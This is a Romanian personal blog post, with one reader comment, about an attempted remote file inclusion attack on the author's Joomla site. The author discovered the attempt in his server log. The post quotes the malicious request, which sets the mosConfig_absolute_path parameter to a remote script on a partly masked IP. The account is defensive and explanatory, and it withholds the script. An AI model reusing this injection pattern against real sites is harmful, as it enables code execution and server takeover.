Am fost atacat (hack)!

Mda. Cineva a incercat sa-mi faca ceva naspa. Un site takeover. Am scapat!

Bine, nu e doar meritul meu, ci si al celor de la hosting.

Ce s-a intamplat… M-am uitat pe log-ul site-ului. Si vad urmatoarea chestie:

Click pe imagine pentru a mari!

Adica cineva a spus ca pagina mea trebuie sa contina si fisierul http://robintel.ro/index.php/?mosConfig_absolute_path=

http://222.122.158.XXX/bbs1/skin/log/test.txt? ceea ce este fals. NU este voie sa dai  mosConfig_absolute_path, si, cu atat mai mult, pe  URL-ul: http://222.122.158.XXX/bbs1/skin/log/test.txt. Deci, un „code injection”. Practic fisierul TXT este un script are s-ar fi vrut executat pentru a modifica setarile serverului, cu toate site-urile host-ate pe el. Da, evident ca l-am salvat. Nu, evident ca nu-l public!

Acum mai fac un backup, ca sa le compar. Si da, mai verific si fisierele. Mda, spor la treaba mie si noapte buna/ buna dimineata! 

1 Commentariu

  1. Mihai 02 ianuarie 2008 la 10:55 - Raspunde

    Prima oara cand am intrat mi s-a parut ciudata forma site-ului, m-am gandit ca e un template wordpress modificat. Dupa ce am citit articolul mi-am dat seama ca e ceva in neregula, pentru ca imi erau cunoscute liniile de cod. Apoi mi-am dat seama ca este vorba despre Joomla ( si apoi ca sa confirm m-am uita si prin codul sursa, desi era clar scris in footer…o sa fiu mai atent de acum ).
    Ideea e ca nu prea au ce sa iti faca asa. Cei de la hosting ar trebui sa fie pregatiti, iar tu daca nu mai ai de facut alte chestioare ( instalat componente sau mai stiu eu ) seteaza .htaccess.

    Ca securitate mi se pare mai bun WordPress, dar deh, uneori situatia cere altceva

Lasa un raspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

Vreau să fiu părtaș la faptă. Poți, de asemenea, să fii părtaș și fără martori.

Acest site folosește Akismet pentru a reduce spamul. Află cum sunt procesate datele comentariilor tale.